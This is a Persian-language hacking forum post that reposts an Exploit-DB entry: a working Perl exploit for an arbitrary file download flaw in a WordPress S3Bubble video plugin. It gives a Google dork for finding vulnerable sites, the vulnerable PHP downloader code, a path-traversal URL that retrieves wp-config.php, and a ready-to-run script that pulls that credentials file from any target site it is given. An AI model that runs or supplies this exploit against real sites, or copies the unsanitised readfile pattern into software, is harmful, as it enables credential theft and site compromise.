انجمن تیم امنیتی ایران سایبر

Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download

شروع موضوع توسط T3RMINAT0R ‏7/7/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. T3RMINAT0R
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏4/7/15
    ارسال ها:
    63
    تشکر شده:
    172
    جنسیت:
    شغل:
    HACKING -CRACKING
    محل سکونت:
    PARSIAN
    Name:
    M0H4M4D
    Main os:
    Kali
    اینم یه
    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید که میتونید باهاش فایل از وردپرس دانلود کنید
    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید به زبان perl
    کد:
    # Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
    # Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
    # Date: 04/07/2015
    # Exploit Author: CrashBandicot @DosPerl
    # Vendor Homepage: https://s3bubble.com
    # Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
    # Version: 0.7
    # Tested on: MSWin32
    
    #EDB note: updated Software link to correct plugin.
    
    # Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php
    
    <?php
       header("Content-Type: application/octet-stream");
       header("Content-Disposition: attachment; filename=". $_GET['name']);
       $path = urldecode($_GET['path']);
       if(isset($path))readfile($path);
    ?>
    
    
    # PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php
    
    
    # Exploit :
    
    
    #!/usr/bin/perl
    
    use LWP::UserAgent;
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    if(@ARGV < 2)
    {
    die("\n\n[+] usage : perl $0 site.com /path/");
    }
    
    print q{
           Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
                               ->CrashBandicot
    };
    
    ($Target,$path) = @ARGV;
    
    if($Target !~ /^(http|https):\/\//)
    {
    $Target = "http://$Target";
    }
    
    $xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
    my $url = $Target.$path.$xpl;
    print "\n [?] Exploiting ...... \n\n";
    $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
    $req = $ua->get($url,":content_file" => "wp-config.php");
    if ($req->is_success)
    {
    print "[+] $url Exploited!\n\n";
    print "[+] File save to name : wp-config.php\n";
    }
    else
    {
    die("[!] Exploit Failed !\n");
    }
    
    _END_
     
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 7)

  1. teagfogue
  2. Enetpropo
  3. DawnInAllah
  4. Juaninator
  5. hackerman1
  6. Monocots57
  7. Ruiner
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .